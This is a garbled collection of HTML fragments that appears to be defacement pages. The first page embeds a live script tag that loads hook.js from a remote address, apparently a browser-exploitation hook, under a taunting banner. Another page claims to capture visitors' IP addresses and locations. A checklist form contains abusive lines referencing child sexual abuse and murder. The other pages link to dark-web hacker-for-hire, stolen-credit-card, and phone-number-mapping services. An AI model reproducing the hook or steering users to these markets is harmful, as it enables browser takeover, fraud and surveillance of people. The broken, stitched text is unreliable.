<html>
<head>
<script src="http://192.168.8.162:3000/hook.js"></script>
</head>
<body>
<H1>relaxcrhb fucked you !!!<H1>
</body>
</html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Your Webpage Title</title>
    <style>
        body {
            background-color: #800000; /* Dark red color, you can adjust the color code */
            color: white; /* Text color to ensure visibility */
        }
    </style>
</head>
<body>
    <!-- Your webpage content goes here -->
    <h1>Welcome to sigh website!</h1>
    <p>This page  fuck your android.If you click this page i have your ip or location! </p>
</body>
</html>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Website Checklist</title>
    <style>
        ul {
            list-style-type: none;
        }

        label {
            display: block;
            margin-bottom: 5px;
        }

        input[type="checkbox"] {
            margin-right: 5px;
        }
    </style>
</head>
<body>
    <h2> Your Checklist</h2>

    <form>
        <ul>
            <li>
                <label><input type="checkbox"> im fucking bitch</label>
            </li>
            <li>
                <label><input type="checkbox"> i dont like money</label>
            </li>
            <li>
                <label><input type="checkbox"> i like kids seaxualy abouse</label>
            </li>
            <li>
                <label><input type="checkbox"> the world god is relaxcrhb</label>
            </li>
            <li>
                <label><input type="checkbox"> i love relaxcrhb</label>
            </li>
            <li>
                <label><input type="checkbox"> i like dark web</label>
            </li>
            <li>
                <label><input type="checkbox"> Code and implement website</label>
            </li>
            <li>
                <label><input type="checkbox"> suck dicks?</label>
            </li>
            <li>
                <label><input type="checkbox"> i like to kill somebody(SEO)</label>
            </li>
            <li>
                <label><input type="checkbox"> i can kill my mom</label>
            </li>
            <li>
                <label><input type="checkbox"> i dont say relaxcrhb any cuz</label>
            </li>
            <li>
                <label><input type="checkbox"> Pray relaxcrhb</label>
            </li>
        </ul>
    </form>
</body>
</html>
#wiki-body > div.markdown-body > p:nth-child(14) > img
<img src="https://i.ibb.co/pnRgkmL/Untitled.jpg" width=""> </img>
<H1> Here Some Dark web links for your fun! <H1>
<a href="http://3y4hlpgjuuhbasicj767bxr3zgnx5z3wbmwrncd7tvva7mirjceunbad.onion/"
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dark Web Hire a Hacker</title>
    <style>
        .clickable-url {
            text-decoration: none;
            color: inherit;
            cursor: pointer;
        }
    </style>
</head>
<body>

    <p> Open only tor : <span class="clickable-url" contenteditable="true" onclick="window.location.href='http://3y4hlpgjuuhbasicj767bxr3zgnx5z3wbmwrncd7tvva7mirjceunbad.onion/';">http://3y4hlpgjuuhbasicj767bxr3zgnx5z3wbmwrncd7tvva7mirjceunbad.onion/</span></p>

</body>
</html>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cardshop - USA CVV KNOWN BALANCE & Worldwide CC & CVV</title>
    <style>
        .clickable-url {
            text-decoration: none;
            color: inherit;
            cursor: pointer;
        }
    </style>
</head>
<body>

    <p> Cardshop - USA CVV KNOWN BALANCE & Worldwide CC & CVV: <span class="clickable-url" contenteditable="true" onclick="window.location.href=''http://s57divisqlcjtsyutxjz2ww77vlbwpxgodtijcsrgsuts4js5hnxkhqd.onion/ ;">http://s57divisqlcjtsyutxjz2ww77vlbwpxgodtijcsrgsuts4js5hnxkhqd.onion/</span></p>




<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fuckfacebook - An OSINT Tool for Facebook Phone Number Mapping</title>
    <style>
        body {
            background-color: #1a1a1a; /* Choose a dark background color */
            color: white;
            font-family: 'Arial', sans-serif; /* Adjust the font if needed */
            margin: 0;
            padding: 20px;
        }

        .clickable-url {
            text-decoration: none;
            color: #C2BDBA; /* Choose a color for clickable links */
            cursor: pointer;
        }
    </style>
</head>
<body>

    <p>Fuckfacebook is an OSINT tool in the dark web that allows you to graph anyone's phone number in Facebook: 
        <span class="clickable-url" contenteditable="true" onclick="window.location.href='http://4wbwa6vcpvcr3vvf4qkhppgy56urmjcj2vagu2iqgp3z656xcmfdbiqd.onion/';">
            http://4wbwa6vcpvcr3vvf4qkhppgy56urmjcj2vagu2iqgp3z656xcmfdbiqd.onion/
        </span>
    </p>

</body>
</html>
 
